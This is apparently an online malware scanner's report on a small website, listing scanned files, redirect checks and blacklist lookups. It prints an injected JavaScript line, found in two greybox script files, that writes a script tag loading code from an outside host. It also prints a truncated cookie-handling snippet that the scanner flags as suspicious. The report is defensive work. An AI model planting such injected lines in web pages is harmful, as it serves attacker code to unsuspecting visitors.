Scanned pages/files
| Request | Server response | Status |
http://parthomas.com/ | 200 OK Content-Length: 8198 Content-Type: text/html | clean |
http://parthomas.com/move.js | 200 OK Content-Length: 3888 Content-Type: application/javascript | suspicious |
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user228 = getCo function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");} | ||
http://parthomas.com/shop.html | 200 OK Content-Length: 6081 Content-Type: text/html | clean |
http://parthomas.com/shop-mariatheresienstrasse.php | 200 OK Content-Length: 13529 Content-Type: text/html | clean |
http://parthomas.com/greybox/AJS.js | 200 OK Content-Length: 20077 Content-Type: application/javascript | suspicious |
Suspicious code found /*hbinahbina09460hbina09*/ document.write("<script type='text/javascript' src='http://xhtvfm.com/octaviora/W9jLFdyv.php?id='></"+ "script>"); | ||
http://parthomas.com/greybox/gb_scripts.js | 200 OK Content-Length: 11112 Content-Type: application/javascript | suspicious |
Suspicious code found /*hbinahbina09460hbina09*/ document.write("<script type='text/javascript' src='http://xhtvfm.com/octaviora/W9jLFdyv.php?id='></"+ "script>"); | ||
http://parthomas.com/index.html | 200 OK Content-Length: 8198 Content-Type: text/html | clean |
http://parthomas.com/journal.html | 200 OK Content-Length: 16194 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/Krone-07-12.pdf | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://parthomas.com/test404page.js | 404 Not Found Content-Length: 291 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/20er.jpg | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/zeit-aut-gsa.pdf | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/zeit-aut-gsa(2).pdf | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/augsburger-allgemeine-gsa.pdf | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/diezeit-gsa.pdf | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: parthomas.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 20 Jan 2015 12:55:25 GMT
Accept-Ranges: bytes
ETag: "2302e27-2006-503aedd778ca0"
Server: Apache/2.2.14 (Ubuntu)
Content-Length: 8198
Content-Type: text/html
Last-Modified: Mon, 22 Sep 2014 22:20:58 GMT
X-Pad: avoid browser bug
...8198 bytes of data.
GET / HTTP/1.1
Host: parthomas.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 20 Jan 2015 12:55:25 GMT
Accept-Ranges: bytes
ETag: "2302e27-2006-503aedd778ca0"
Server: Apache/2.2.14 (Ubuntu)
Content-Length: 8198
Content-Type: text/html
Last-Modified: Mon, 22 Sep 2014 22:20:58 GMT
X-Pad: avoid browser bug
...8198 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: parthomas.com
Referer: http://www.google.com/search?q=parthomas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: parthomas.com
Referer: http://www.google.com/search?q=parthomas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=parthomas.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://parthomas.com/
Result: parthomas.com is not infected or malware details are not published yet.
Result: parthomas.com is not infected or malware details are not published yet.